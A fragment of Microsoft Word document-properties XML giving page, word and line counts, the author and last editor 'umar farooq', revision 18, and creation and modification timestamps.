43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43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435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3</Pages>
  <Words>196</Words>
  <Characters>1280</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>213</Lines>
  <Paragraphs>105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farooq</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>umar farooq</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-20T06:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-20T06:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>